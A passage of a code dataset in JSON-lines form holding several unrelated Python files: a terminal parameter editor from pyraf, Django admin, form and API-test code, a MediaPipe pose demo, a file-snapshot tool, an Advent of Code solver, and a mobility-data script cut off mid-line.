self.buttons = urwid.Columns([('weight', 0.20, self.exec_button),\n ('weight', 0.23, self.save_button),\n ('weight', 0.23, self.cancel_button),\n ('weight', 0.20, self.help_button)])\n else:\n if not self.__areAnyToLoad: # show Save As but not Open\n self.buttons = urwid.Columns([\n ('weight', 0.15, self.exec_button),\n ('weight', 0.15, self.save_button),\n ('weight', 0.18, self.save_as_button),\n ('weight', 0.18, self.cancel_button),\n ('weight', 0.15, self.help_button)\n ])\n else: # show all possible buttons (iterated on this spacing)\n self.buttons = urwid.Columns([\n ('weight', 0.10, self.open_button),\n ('weight', 0.10, self.exec_button),\n ('weight', 0.10, self.save_button),\n ('weight', 0.12, self.save_as_button),\n ('weight', 0.12, self.cancel_button),\n ('weight', 0.10, self.help_button)\n ])\n\n def get_default_param_list(self):\n # Obtain the default parameter list\n dlist = self.taskObject.getDefaultParList()\n if len(dlist) != len(self.paramList):\n # whoops, lengths don't match\n raise ValueError(\"Mismatch between default, current par lists\"\n f\" for task {self.taskName} (try unlearn)\")\n pardict = {}\n for par in dlist:\n pardict[par.name] = par\n\n # Build default list sorted into same order as current list\n try:\n dsort = []\n for par in self.paramList:\n dsort.append(pardict[par.name])\n except KeyError:\n raise ValueError(\"Mismatch between default, current par lists\"\n f\" for task {self.taskName} (try unlearn)\")\n self.defaultParamList = dsort\n\n # Method to create the parameter entries\n def make_entries(self):\n # Loop over the parameters to create the entries\n self.entryNo = [None] * self.numParams\n for i in range(self.numParams):\n self.entryNo[i] = self.tpar_option_factory(\n self.paramList[i], self.defaultParamList[i])\n\n def main(self):\n # Create the Screen using curses_display.\n self.ui = urwid.curses_display.Screen()\n self.ui.register_palette(self.palette)\n self.ui.run_wrapper(self.run) # raw_display has alternate_buffer=True\n self.done()\n\n def get_keys(self):\n keys = []\n while not keys:\n try:\n keys = self.ui.get_input()\n except KeyboardInterrupt:\n keys = [\"ctrl c\"]\n return keys\n\n def run(self):\n self.ui.set_mouse_tracking()\n size = self.ui.get_cols_rows()\n self.done = False\n self._newline = True\n while not self.done:\n self.view.keypress(size, \"ready\")\n canvas = self.view.render(size, focus=1)\n self.ui.draw_screen(size, canvas)\n for k in self.get_keys():\n if k == \":\":\n self.colon_escape()\n break\n elif urwid.is_mouse_event(k):\n event, button, col, row = k\n self.view.mouse_event(size,\n event,\n button,\n col,\n row,\n focus=True)\n elif k == 'window resize':\n size = self.ui.get_cols_rows()\n self.inform(f\"resize {str(size)}\")\n k = self.keypress(size, k)\n self.view.keypress(size, k)\n\n def colon_escape(self):\n \"\"\"colon_escape switches the focus to the 'mini-buffer' and\n accepts and executes a one line colon command.\"\"\"\n w, pos0 = self.listbox.get_focus()\n try:\n default_file = w.get_result()\n except:\n default_file = \"\"\n self.listbox.set_focus(len(self.listitems) - 2)\n size = self.ui.get_cols_rows()\n self.colon_edit.set_edit_text(\"\")\n self.colon_edit.set_edit_pos(0)\n self.view.keypress(size, \":\")\n done = False\n while not done:\n canvas = self.view.render(size, focus=1)\n self.ui.draw_screen(size, canvas)\n for k in self.get_keys():\n if urwid.is_mouse_event(k) or \\\n k == \"ctrl c\" or k == \"ctrl g\":\n self.colon_edit.set_edit_text(\"\")\n return\n elif k == 'window resize':\n size = self.ui.get_cols_rows()\n elif k == 'enter':\n done = True\n break\n k = self.keypress(size, k)\n self.view.keypress(size, k)\n cmd = self.colon_edit.get_edit_text()\n self.listbox.set_focus(pos0)\n self.colon_edit.set_edit_text(\"\")\n self.process_colon(cmd)\n\n def process_colon(self, cmd):\n # : [!] []\n groups = re.match(\n \"^:(?P[a-z])\\\\s*\"\n \"(?P!?)\\\\s*\"\n \"(?P\\\\w*)\", cmd)\n if not groups:\n self.inform(\"bad command: \" + cmd)\n else:\n letter = groups.group(\"cmd\")\n emph = groups.group(\"emph\") == \"!\"\n file = groups.group(\"file\")\n try:\n f = {\n \"q\": self.QUIT,\n \"g\": self.go,\n \"r\": self.read_pset,\n \"w\": self.write_pset,\n \"e\": self.edit_pset\n }[letter]\n except KeyError:\n self.inform(\"unknown command: \" + cmd)\n return\n try:\n f(file, emph)\n except Exception as e:\n self.inform(f\"command '{cmd}' failed with exception '{e}'\")\n\n def save_as(self):\n \"\"\" Save the parameter settings to a user-specified file. Any\n changes here must be coordinated with the corresponding epar saveAs\n function. \"\"\"\n\n # The user wishes to save to a different name.\n fname = self.select_file(\"Save parameter values to which file?\",\n overwriteCheck=True)\n\n # Now save the parameters\n if fname is None:\n msg = \"Parameters NOT saved to a file.\"\n okdlg = urwutil.DialogDisplay(msg, 8, 0)\n okdlg.add_buttons([(\"OK\", 0)])\n okdlg.main()\n return\n\n # Tpar apparently does nothing with children (PSETs), so skip the\n # check or set or save of them\n\n # Notify them that pset children will not be saved as part of\n # their special version\n pars = []\n for par in self.paramList:\n if par.type == \"pset\":\n pars.append(par.name)\n if len(pars):\n msg = \"If you have made any changes to the PSET \"+ \\\n \"values for:\\n\\n\"\n for p in pars:\n msg += \" \" + p + \"\\n\"\n msg = msg+\"\\nthose changes will NOT be explicitly saved to:\"+ \\\n '\\n\\n\"'+fname+'\"'\n # title='PSET Save-As Not Yet Supported\n okdlg = urwutil.DialogDisplay(msg, 0, 0)\n okdlg.add_buttons([(\"OK\", 0)])\n okdlg.main()\n\n # Verify all the entries (without save), keeping track of the invalid\n # entries which have been reset to their original input values\n self.badEntriesList = self.check_set_save_entries(False)\n\n # If there were invalid entries, prepare the message dialog\n ansOKCANCEL = True\n if self.badEntriesList:\n ansOKCANCEL = self.process_bad_entries(self.badEntriesList,\n self.taskName)\n if not ansOKCANCEL:\n return # should we tell them we are not saving ?\n\n # If there were no invalid entries or the user said OK, finally\n # save to their stated file. Since we have already processed the\n # bad entries, there should be none returned.\n mstr = \"TASKMETA: task=\" + self.taskName + \" package=\" + self.pkgName\n if self.check_set_save_entries(doSave=True,\n filename=fname,\n comment=mstr):\n raise Exception(\"Unexpected bad entries for: \" + self.taskName)\n\n # Let them know what they just did\n msg = 'Saved to: \"' + fname + '\"'\n okdlg = urwutil.DialogDisplay(msg, 8, 0)\n okdlg.add_buttons([(\"OK\", 0)])\n okdlg.main()\n\n # Notify irafpar that there is a new special-purpose file on the scene\n irafpar.newSpecialParFile(self.taskName, self.pkgName, fname)\n\n def pfopen(self):\n \"\"\" Load the parameter settings from a user-specified file. Any\n changes here must be coordinated with the corresponding epar pfopen\n function. \"\"\"\n\n flist = irafpar.getSpecialVersionFiles(self.taskName, self.pkgName)\n if len(flist) <= 0:\n msg = \"No special-purpose parameter files found for \" + self.taskName\n okdlg = urwutil.DialogDisplay(msg, 8, 0)\n okdlg.add_buttons([(\"OK\", 0)])\n okdlg.main()\n return\n\n fname = None\n if len(flist) == 1:\n msg = \"One special-purpose parameter file found.\\n\"+ \\\n \"Load file?\\n\\n\"+flist[0]\n yesnodlg = urwutil.DialogDisplay(msg, 12, 0)\n yesnodlg.add_buttons([(\"OK\", 0), (\"Cancel\", 1)])\n rv, junk = yesnodlg.main()\n if rv == 0:\n fname = flist[0] # if not, fname is still None\n else: # >1 file, need a select dialog\n flist.sort()\n chcs = [] # ListDialogDisplay takes a 2-column tuple\n for i in range(len(flist)):\n chcs.append(str(i)) # need index as tag - it is the return val\n chcs.append(flist[i])\n\n def menuItemConstr(tag, state):\n return urwutil.MenuItem(tag)\n\n selectdlg = urwutil.ListDialogDisplay(\"Select from these:\",\n len(flist) + 7,\n 75, menuItemConstr,\n tuple(chcs), False)\n selectdlg.add_buttons([\n (\"Cancel\", 1),\n ])\n rv, ans = selectdlg.main()\n if rv == 0:\n fname = flist[int(ans)]\n\n # check-point: if fname is not None, we load a file\n msg = \"\\n\\nPress any key to continue...\"\n\n if fname is not None:\n newParList = irafpar.IrafParList(self.taskName, fname) # load it\n self.set_all_entries_from_par_list(newParList) # set GUI entries\n msg = \"\\n\\nLoaded:\\n\\n \" + fname + msg\n\n # Notify them (also forces a screen redraw, which we need)\n try:\n self.ui.clear() # fixes clear when next line calls draw_screen\n except AttributeError:\n self.ui._clear() # older urwid vers use different method name\n self.info(msg, None)\n\n def save(self, emph):\n # Save all the entries and verify them, keeping track of the invalid\n # entries which have been reset to their original input values\n if emph:\n return\n self.badEntriesList = self.check_set_save_entries(True)\n\n # If there were invalid entries, prepare the message dialog\n ansOKCANCEL = True\n if (self.badEntriesList):\n ansOKCANCEL = self.process_bad_entries(self.badEntriesList,\n self.taskName)\n return ansOKCANCEL\n\n def MOVE_START(self):\n self.listbox.set_focus(1)\n return \"home\"\n\n def MOVE_END(self):\n self.listbox.set_focus(len(self.entryNo))\n return \"end\"\n\n # For the following routines, event is either a urwid event *or*\n # a Pset filename\n def QUIT(self, event=None, emph=True): # maybe save\n self.save(emph)\n\n def quit_continue():\n pass\n\n self.done = quit_continue\n\n def PFOPEN(self, event=None):\n \"\"\" Open button - load parameters from a user specified file\"\"\"\n self.pfopen()\n self.done = None # simply continue\n\n def SAVEAS(self, event=None):\n \"\"\" SaveAs button - save parameters to a user specified file\"\"\"\n self.save_as()\n\n def save_as_continue(): # get back to editing\n iraffunctions.tparam(self.taskObject)\n\n self.done = save_as_continue # self.done = None # will also continue\n\n def EXIT(self, event=None): # always save\n self.QUIT(event, False)\n\n # EXECUTE: save the parameter settings and run the task\n def go(self, event=None, emph=False):\n \"\"\"Executes the task.\"\"\"\n self.save(emph)\n\n def go_continue():\n print(f\"\\nTask {self.taskName} is running...\\n\")\n self.run_task()\n\n self.done = go_continue\n\n def edit_pset(self, file, emph):\n \"\"\"Edits the pset referred to by the specifiefd file or the current field.\"\"\"\n self.save(emph)\n w, pos0 = self.listbox.get_focus()\n try:\n default_file = w.get_result()\n except:\n default_file = \"\"\n if file == \"\":\n iraffunctions.tparam(default_file)\n else:\n\n def edit_pset_continue():\n iraffunctions.tparam(file)\n\n self.done = edit_pset_continue\n\n def read_pset(self, file, emph):\n \"\"\"Unlearns the current changes *or* reads in the specified file.\"\"\"\n if file == \"\":\n self.unlearn_all_entries()\n else:\n\n def new_pset():\n self.__init__(file)\n\n self.done = new_pset\n\n def write_pset(self, file, overwrite):\n if os.path.exists(file) and not overwrite:\n self.inform(f\"File '{file}' exists and overwrite (!) not used.\")\n # XXXX write out parameters to file\n self.inform(f\"write pset: {file}\")\n\n def set_all_entries_from_par_list(self, aParList):\n \"\"\" Set all the parameter entry values in the GUI to the values\n in the given par list. Note corresponding EditParDialog method. \"\"\"\n for i in range(self.numParams):\n par = self.paramList[i]\n if par.type == \"pset\":\n continue # skip PSET's for now\n gui_entry = self.entryNo[i]\n par.set(aParList.getValue(par.name, native=1, prompt=0))\n # gui holds a str, but par.value is native; conversion occurs\n gui_entry.set_result(par.value)\n\n def unlearn_all_entries(self):\n \"\"\" Method to \"unlearn\" all the parameter entry values in the GUI\n and set the parameter back to the default value \"\"\"\n for entry in self.entryNo:\n entry.unlearn_value()\n\n # Read, save, and verify the entries\n def check_set_save_entries(self, doSave, filename=None, comment=None):\n\n self.badEntries = []\n\n # Loop over the parameters to obtain the modified information\n for i in range(self.numParams):\n\n par = self.paramList[i]\n entry = self.entryNo[i]\n # Cannot change an entry if it is a PSET, just skip\n if par.type == \"pset\":\n continue\n\n value = entry.get_result()\n\n # Set new values for changed parameters - a bit tricky,\n # since changes that weren't followed by a return or\n # tab have not yet been checked. If we eventually\n # use a widget that can check all changes, we will\n # only need to check the isChanged flag.\n if par.isChanged() or value != entry._previousValue:\n # Verify the value is valid. If it is invalid,\n # the value will be converted to its original valid value.\n # Maintain a list of the reset values for user notification.\n if not entry.verify(value):\n self.badEntries.append(\n [entry.paramInfo.name, value, entry._previousValue])\n else:\n self.taskObject.setParam(par.name, value)\n\n # Save results to the uparm directory\n # Skip the save if the thing being edited is an IrafParList without\n # an associated file (in which case the changes are just being\n # made in memory.)\n\n if doSave and ((not isinstance(self.taskObject, irafpar.IrafParList))\n or self.taskObject.getFilename()):\n self.taskObject.saveParList(filename=filename, comment=comment)\n\n return self.badEntries\n\n # Run the task\n def run_task(self):\n\n # Use the run method of the IrafTask class\n # Set mode='h' so it does not prompt for parameters (like IRAF epar)\n # Also turn on parameter saving\n self.taskObject.run(mode='h', _save=1)\n\n def get_results(self):\n results = {}\n for i in self.items:\n results[i.get_name()] = i.get_result()\n return results\n\n def draw_screen(self, size):\n canvas = self.view.render(size, focus=True)\n self.ui.draw_screen(size, canvas)\n\n def inform(self, s):\n \"\"\"output any message to status bar\"\"\"\n self.footer.set_text(s)\n\n def info(self, msg, b):\n self.exit_flag = False\n size = self.ui.get_cols_rows()\n exit_button = urwid.Padding(urwid.Button(\"Exit\", self.exit_info),\n align=\"center\",\n width=8)\n frame = urwid.Frame(urwid.Filler(urwid.AttrWrap(\n urwid.Text(msg), \"help\"),\n valign=\"top\"),\n header=self.header,\n footer=exit_button)\n canvas = frame.render(size)\n self.ui.draw_screen(size, canvas)\n self.get_keys() # wait for keypress\n\n def exit_info(self, ehb):\n self.exit_flag = True\n\n def HELP(self, event=None):\n if self._editor == \"vi\":\n self.info(TPAR_HELP_VI, self.help_button)\n else:\n self.info(TPAR_HELP_EMACS, self.help_button)\n\n def select_file(self, prompt, overwriteCheck=False):\n \"\"\" Allow user to input a file - handle whether it is expected\n to be new or existing. Returns file name on success, None on error. \"\"\"\n\n # Allow the user to select a specific file. Note that urwid's\n # browser example (browse.py) doesn't work with 0.9.7.\n while True:\n try:\n fname = urwfiledlg.main()\n except:\n prompt = \"(File chooser error, enter choice manually.)\\n\" + prompt\n inputdlg = urwutil.InputDialogDisplay(prompt, 9, 0)\n inputdlg.add_buttons([(\"OK\", 0), (\"Cancel\", 1)])\n rv, fname = inputdlg.main()\n if rv > 0:\n fname = None\n\n if fname is None:\n return None # they canceled\n fname = fname.strip()\n if len(fname) == 0:\n return None\n\n # See if the file exists (if we care)\n if overwriteCheck and os.path.exists(fname):\n yesnodlg = urwutil.DialogDisplay(\n \"File exists! Overwrite?\\n\\n \" + fname, 9, 0)\n yesnodlg.add_buttons([(\"Yes\", 0), (\"No\", 1)])\n rv, junk = yesnodlg.main()\n if rv == 0:\n return fname\n # if no, then go thru selection again\n else:\n return fname\n\n def askokcancel(self, title, msg):\n self.info(msg, None)\n return False\n\n # Process invalid input values and invoke a query dialog\n def process_bad_entries(self, badEntriesList, taskname):\n\n tpl = \"{:>20s} {:>20s} {:>20s}\\n\"\n badEntriesString = \"\\nTask \" + taskname.upper() + \\\n \" -- Invalid values have been entered.\\n\\n\"\n badEntriesString += tpl.format(\"Parameter\", \"Bad Value\", \"Reset Value\")\n for i in range(len(badEntriesList)):\n badEntriesString += tpl.format(badEntriesList[i][0].strip(),\n badEntriesList[i][1].strip(),\n badEntriesList[i][2].strip())\n\n badEntriesString += \"\\nOK to continue using\"\\\n \" the reset\\nvalues or cancel to re-enter\\nvalues?\\n\"\n\n # Invoke the modal message dialog\n return (self.askokcancel(\"Notice\", badEntriesString))\n\n # TparOption values for non-string types\n _tparOptionDict = {\n \"b\": BooleanTparOption,\n \"r\": NumberTparOption,\n \"d\": NumberTparOption,\n \"i\": NumberTparOption,\n \"pset\": PsetTparOption,\n \"ar\": NumberTparOption,\n \"ai\": NumberTparOption,\n }\n\n def tpar_option_factory(self, param, defaultParam):\n \"\"\"Return TparOption item of appropriate type for the parameter param\"\"\"\n # If there is an enumerated list, regardless of datatype, use\n # the EnumTparOption\n if (param.choice is not None):\n tparOption = EnumTparOption\n else:\n # Use String for types not in the dictionary\n tparOption = self._tparOptionDict.get(param.type, StringTparOption)\n return tparOption(param, defaultParam, self.inform)\n\n\ndef tpar(taskName):\n if isinstance(urwid, FakeModule):\n print(f'''\nThe urwid package isn't found on your Python system so tpar can't be used.'\n (the error given: \"{urwid.the_error}\")'\nPlease install urwid or use epar instead.\n''', file=sys.stderr)\n return\n TparDisplay(taskName).main()\n","repo_name":"iraf-community/pyraf","sub_path":"pyraf/tpar.py","file_name":"tpar.py","file_ext":"py","file_size_in_byte":45984,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"47"} +{"seq_id":"33610402455","text":"\"\"\"\nRegister your models here.\nbasically registering and showing all of our models on the admin portal\n\"\"\"\nfrom django.contrib import admin\nfrom .models import Classroom, Assignment\n\nclass ClassroomAdmin(admin.ModelAdmin):\n \"\"\"\n Model storing all classes\n \"\"\"\n list_display = ('className', 'courseID', 'teacher', 'classTeacherMail', 'classCode')\n \nclass AssignmentAdmin(admin.ModelAdmin):\n \"\"\"\n Model storing all classes\n \"\"\"\n list_display = ('title', 'description', 'assignmentCode',\n 'link', 'classroom', 'video',)\n\n\n# registering the models so that we can access them in admin panel\nadmin.site.register(Classroom, ClassroomAdmin)\nadmin.site.register(Assignment, AssignmentAdmin)\n\n","repo_name":"saksham117/Augmented_Reality_Chatbot","sub_path":"neobot/classRoom/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"41061046247","text":"import cv2\nimport mediapipe as mp\n\n# Inicialize o MediaPipe\nmp_pose = mp.solutions.pose\npose = mp_pose.Pose()\n\n# Inicialize a captura de vídeo da webcam\ncap = cv2.VideoCapture(0)\n\nwhile True:\n ret, frame = cap.read()\n\n if not ret:\n break\n\n # Realize a detecção de pose\n results = pose.process(frame)\n\n # Desenhe as posições dos pontos do corpo na imagem\n if results.pose_landmarks:\n for landmark in results.pose_landmarks.landmark:\n # Converta as coordenadas normalizadas para coordenadas de pixel\n h, w, c = frame.shape\n cx, cy = int(landmark.x * w), int(landmark.y * h)\n \n # Desenhe um círculo nos landmarks\n cv2.circle(frame, (cx, cy), 5, (0, 255, 0), -1)\n\n # Exiba a imagem com as detecções\n cv2.imshow('Detecção de Corpo', frame)\n\n # Verifique se a tecla 'q' foi pressionada para sair do loop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Libere a captura de vídeo e feche as janelas\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"leandric/visao_computacional","sub_path":"projetos/testes/corpo.py","file_name":"corpo.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16594952717","text":"# forms.py\nfrom django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .models import PlantationUser\n\nclass RegistrationForm(UserCreationForm):\n email = forms.EmailField(max_length=254, help_text='Required. Enter a valid email address.')\n\n class Meta:\n model = PlantationUser\n fields = ('first_name', 'last_name', 'email', 'password1', 'password2')\n\n widgets = {\n \"as_admin\": forms.TextInput(attrs={\"placeholder\": \"please enter your employement id\"})\n }\n\nclass RadioSelectWidget(forms.widgets.Widget):\n template_name = 'radio.html' # You can customize the template for your radio buttons\n\n def get_context(self, name, value, attrs):\n context = super().get_context(name, value, attrs)\n context['widget']['is_radio'] = True # Add a flag to distinguish radio buttons\n return context\n\n\nclass PlantationUpdateUserForm(forms.ModelForm):\n class Meta:\n model = PlantationUser\n fields = (\"role\",)\n\n widgets = {\n \"role\": forms.RadioSelect(),\n }\n\n def __init__(self, *args, **kwargs):\n super(PlantationUpdateUserForm, self).__init__(*args, **kwargs)\n\n # Set the empty_label to None for the select field\n self.fields['role'].choices = PlantationUser.ROLE\n\n","repo_name":"sanelemngadi/plantation-3","sub_path":"user/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39851759436","text":"from unittest import TestCase\n\nfrom django.contrib.auth.models import User\nfrom rest_framework import status\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.test import APITestCase, APIClient\nfrom rest_framework.reverse import reverse\n\nCOMPLETED_DESK_URL = reverse('desk_completed-list')\n\n\nclass PublicUserDeskApiTest(TestCase):\n \"\"\"\n Testing unauthenticated recipe API request\n \"\"\"\n\n def setUp(self):\n self.client = APIClient()\n\n def test_account_no_auth_required(self):\n response = self.client.get(COMPLETED_DESK_URL)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateUserDeskApiTest(APITestCase):\n \"\"\"\n Testing authenticated API access\n \"\"\"\n\n def setUp(self):\n self.user = User.objects.create_user(\n username='test',\n password='testpassword',\n email='example@mail.ru'\n )\n self.token = Token.objects.create(user=self.user)\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)\n\n def test_account_no_auth_required(self):\n response = self.client.get(COMPLETED_DESK_URL)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n","repo_name":"rytpQWE/Helpdesk","sub_path":"app/desk/tests/test_api_completed_desk.py","file_name":"test_api_completed_desk.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71232898062","text":"import logging\nimport sqlite3\nimport sys\nfrom threading import Thread\nfrom typing import Iterable, Generator, Sequence\n\nfrom .util import connect_store_db\nfrom ..adapter import filesys\nfrom ..adapter.logging import get_logger\nfrom ..adapter.store import Store\nfrom ..model.config import Config\nfrom ..model.file_info import FileInfo\n\nLOGGER = get_logger(__name__)\n\n\ndef main(config: Config):\n config_desc = config_log_string(config)\n LOGGER.info(f\"Start: {config.name}\\n{config_desc}\")\n\n conn, store_db = connect_store_db(config)\n id = store_db.create_import(conn, config.name, config.metadata)\n\n if config.multithread:\n conn.close()\n store_multithread(config, id)\n else:\n store_singlethread(conn, store_db, config, id)\n\n print(id.hex(), file=sys.stdout)\n LOGGER.info(f\"End: {config.name}\\n{config_desc}\")\n\n\ndef store_multithread(config: Config, id: bytes):\n threads = [\n Thread(target=connect_and_store, args=(config, id, file_type, mps))\n for (file_type, mps) in config.match_paths.items()\n ]\n\n for th in threads:\n th.start()\n\n for th in threads:\n th.join()\n\n\ndef store_singlethread(\n conn: sqlite3.Connection, store_db: Store, config: Config, id: bytes\n):\n for (file_type, mps) in config.match_paths.items():\n store(conn, store_db, config, id, file_type, mps)\n\n\ndef connect_and_store(\n config: Config, id: bytes, file_type: str, match_paths: Sequence[str]\n):\n conn, store_db = connect_store_db(config)\n store(conn, store_db, config, id, file_type, match_paths)\n\n\ndef store(\n conn: sqlite3.Connection,\n store_db: Store,\n config: Config,\n id: bytes,\n file_type: str,\n match_paths: Sequence[str],\n):\n LOGGER.info(f\"Start file type: {file_type}\")\n files = filesys.search(\n config.root_dir,\n match_paths,\n file_type=file_type,\n gather_digests=config.compare_digests,\n is_archived=config.is_archived,\n calc_file_group=config.file_group_from,\n )\n\n if LOGGER.level <= logging.DEBUG: # don't degrade performance if not debugging\n files = log_store(files)\n\n store_db.import_files(conn, id, files)\n\n LOGGER.info(f\"End file type: {file_type}\")\n\n\ndef log_store(file_infos: Iterable[FileInfo]) -> Generator[FileInfo, None, None]:\n for file_info in file_infos:\n LOGGER.debug(f\"Storing: {file_info.file_name}\")\n yield file_info\n\n\ndef config_log_string(config: Config) -> str:\n return \"\\n\".join(\n [\n f\" root_dir: {config.root_dir}\",\n f\" store_db_file: {config.store_db_file}\",\n \" metadata:\",\n ]\n + [f\" {k}: {v}\" for (k, v) in config.metadata.items()]\n )\n","repo_name":"ericgj/fs-snapshot","sub_path":"fs_snapshot/command/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15286641693","text":"from suds.sax.date import UTC\nfrom datetime import datetime\n\n\nclass Util(object):\n\n def xml_datetime_difference(self, start, end=None):\n start_dt = UTC(start).datetime\n if end is None:\n # prevent adjustment for timezones due to daylight savings time\n end_dt = UTC(str(UTC())).datetime\n else:\n end_dt = UTC(end).datetime\n return (end_dt - start_dt).total_seconds()","repo_name":"anishasilva/robotframework-sudslibrary","sub_path":"test/resources/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"37869043741","text":"import sys\n\ntest = \"\"\"\\\n$ cd /\n$ ls\ndir a\n14848514 b.txt\n8504156 c.dat\ndir d\n$ cd a\n$ ls\ndir e\n29116 f\n2557 g\n62596 h.lst\n$ cd e\n$ ls\n584 i\n$ cd ..\n$ cd ..\n$ cd d\n$ ls\n4060174 j\n8033020 d.log\n5626152 d.ext\n7214296 k\"\"\"\n\n\nif 'test' in sys.argv:\n data = test.splitlines()\nelse:\n data = [s.rstrip() for s in open('day07.txt').readlines()]\n\nDEBUG = 'debug' in sys.argv\n\nclass Node:\n def __init__(self, name=''):\n self.name = name\n self.children = {}\n self.size = 0\n self.allsize = 0\n def __repr__(self):\n return f\" 40000000\n need = root.allsize - 40000000\n\n # Now do a top-down, remembering all sizes larger than \"need\".\n\n q = [root]\n poss = []\n while q:\n node = q.pop(0)\n if node.allsize >= need:\n poss.append(node.allsize)\n q.extend(list(node.children.values()))\n if DEBUG:\n print(poss)\n\n return qsum, min(poss)\n\nprint(\"Part 1, 2:\", part1(data))\n","repo_name":"timrprobocom/advent-of-code","sub_path":"2022/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72232672143","text":"import pandas as pd\nimport os\n\nstateToFips = {\"AL\": \"04000US01\", \"AK\": \"04000US02\", \"AZ\": \"04000US04\", \"AR\": \"04000US05\", \"CA\": \"04000US06\",\n \"CO\": \"04000US08\", \"CT\": \"04000US09\", \"DE\": \"04000US10\", \"DC\": \"04000US11\", \"FL\": \"04000US12\",\n \"GA\": \"04000US13\", \"HI\": \"04000US15\", \"ID\": \"04000US16\", \"IL\": \"04000US17\", \"IN\": \"04000US18\",\n \"IA\": \"04000US19\", \"KS\": \"04000US20\", \"KY\": \"04000US21\", \"LA\": \"04000US22\", \"ME\": \"04000US23\",\n \"MD\": \"04000US24\", \"MA\": \"04000US25\", \"MI\": \"04000US26\", \"MN\": \"04000US27\", \"MS\": \"04000US28\",\n \"MO\": \"04000US29\", \"MT\": \"04000US30\", \"NE\": \"04000US31\", \"NV\": \"04000US32\", \"NH\": \"04000US33\",\n \"NJ\": \"04000US34\", \"NM\": \"04000US35\", \"NY\": \"04000US36\", \"NC\": \"04000US37\", \"ND\": \"04000US38\",\n \"OH\": \"04000US39\", \"OK\": \"04000US40\", \"OR\": \"04000US41\", \"PA\": \"04000US42\", \"RI\": \"04000US44\",\n \"SC\": \"04000US45\", \"SD\": \"04000US46\", \"TN\": \"04000US47\", \"TX\": \"04000US48\", \"UT\": \"04000US49\",\n \"VT\": \"04000US50\", \"VA\": \"04000US51\", \"WA\": \"04000US53\", \"WV\": \"04000US54\", \"WI\": \"04000US55\",\n \"WY\": \"04000US56\"}\n\nstates = {\"Alabama\": \"AL\", \"Alaska\": \"AK\", \"Arizona\": \"AZ\", \"Arkansas\": \"AR\", \"California\": \"CA\", \"Colorado\": \"CO\",\n \"Connecticut\": \"CT\", \"District of Columbia\": \"DC\", \"Delaware\": \"DE\", \"Florida\": \"FL\", \"Georgia\": \"GA\",\n \"Hawaii\": \"HI\", \"Idaho\": \"ID\", \"Illinois\": \"IL\", \"Indiana\": \"IN\", \"Iowa\": \"IA\", \"Kansas\": \"KS\",\n \"Kentucky\": \"KY\", \"Louisiana\": \"LA\", \"Maine\": \"ME\", \"Maryland\": \"MD\", \"Massachusetts\": \"MA\", \"Michigan\": \"MI\",\n \"Minnesota\": \"MN\", \"Mississippi\": \"MS\", \"Missouri\": \"MO\", \"Montana\": \"MT\", \"Nebraska\": \"NE\", \"Nevada\": \"NV\",\n \"New Hampshire\": \"NH\", \"New Jersey\": \"NJ\", \"New Mexico\": \"NM\", \"New York\": \"NY\", \"North Carolina\": \"NC\",\n \"North Dakota\": \"ND\", \"Ohio\": \"OH\", \"Oklahoma\": \"OK\", \"Oregon\": \"OR\", \"Pennsylvania\": \"PA\",\n \"Rhode Island\": \"RI\", \"South Carolina\": \"SC\", \"South Dakota\": \"SD\", \"Tennessee\": \"TN\", \"Texas\": \"TX\",\n \"Utah\": \"UT\", \"Vermont\": \"VT\", \"Virginia\": \"VA\", \"Washington\": \"WA\", \"West Virginia\": \"WV\",\n \"Wisconsin\": \"WI\", \"Wyoming\": \"WY\", \"Chicago\": \"IL\"}\n\ndf_google = pd.read_csv(\"https://www.gstatic.com/covid19/mobility/Global_Mobility_Report.csv\", low_memory=False)\n\ndf_google = df_google[df_google[\"country_region_code\"] == \"US\"]\ndf_google = df_google[(~df_google[\"sub_region_1\"].isna()) & (df_google[\"sub_region_2\"].isna())]\n\ndf_google = df_google.melt(\n id_vars=[\"country_region\", \"sub_region_1\", \"date\"],\n value_vars=[\n \"retail_and_recreation_percent_change_from_baseline\",\n \"grocery_and_pharmacy_percent_change_from_baseline\",\n \"parks_percent_change_from_baseline\",\n \"transit_stations_percent_change_from_baseline\",\n \"workplaces_percent_change_from_baseline\",\n \"residential_percent_change_from_baseline\"\n ]\n)\n\ndf_google[\"variable\"] = df_google[\"variable\"].replace({\n \"retail_and_recreation_percent_change_from_baseline\": \"Retail and Recreation\",\n \"grocery_and_pharmacy_percent_change_from_baseline\": \"Grocery and Pharmacy\",\n \"parks_percent_change_from_baseline\": \"Parks\",\n \"transit_stations_percent_change_from_baseline\": \"Transit Stations\",\n \"workplaces_percent_change_from_baseline\": \"Workplaces\",\n \"residential_percent_change_from_baseline\": \"Residential\"\n})\n\ndf_google = df_google.drop(columns=[\"country_region\"])\ndf_google = df_google.rename(columns={\n \"sub_region_1\": \"Geography\",\n \"date\": \"Date\",\n \"variable\": \"Type\",\n \"value\": \"Percent Change from Baseline\"\n})\n\ndf_google = 